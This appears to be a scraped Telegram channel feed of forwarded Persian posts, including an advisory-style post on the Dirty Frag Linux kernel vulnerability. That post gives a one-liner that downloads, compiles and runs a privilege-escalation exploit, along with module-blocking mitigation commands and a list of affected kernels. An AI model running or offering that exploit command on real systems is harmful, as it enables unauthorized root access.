Created: 1399/11/22 (2021/02/10)
Writer, Content Researcher: @mhzarchi
Post #481
618
Forwarded from Matin's Dungeon (᯽マティ️️ン先輩)
مگ @mohammadzarchi
Showing posts older than #482 · Back to latest
Forwarded from Matin's Dungeon (᯽マティ️️ン先輩)
Forwarded from ذهن زیبا - A beautiful Mind
This post (sticker, poll or similar) has no web preview. Open in Telegram
This post (sticker, poll or similar) has no web preview. Open in Telegram
Forwarded from وب آموز (m J)

مگاهرتز این پراکندگی پیامهای ارسالی من و برادرمه، برام جالب و باحاله، از طرفی برای هر فردی که اسکاترشو میفرستم جذابه، یک باگی داشت اونم اینکه افراد عادی توانایی استفاده ازش رو نداشتن، باید حتما از API تلگرام استفاده میکردند که گرفتن اونم زیاد داستان داره! تصمیم…

Forwarded from Kamandlou

مگاهرتز تصمیم گرفتم یک کلاینت آنالیز متنباز بسازم

Forwarded from CleverDevs (Mammad)
Forwarded from کانال اطلاعرسانی توزیع پارچ

Forwarded from gooyban🦆

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
echo 3 > /proc/sys/vm/drop_caches
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
ایده شروع این تحقیق از آسیبپذیری Copy Fail گرفته شده. بهطور مشخص، بخش xfrm-ESP در زنجیره آسیبپذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده میکند. اما تفاوت مهم این است که این آسیبپذیری مستقل از وجود ماژول algif_aead فعال میشود.
به عبارت دیگر، حتی اگر روی سیستم راهکار شناختهشده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیبپذیر باقی میماند.
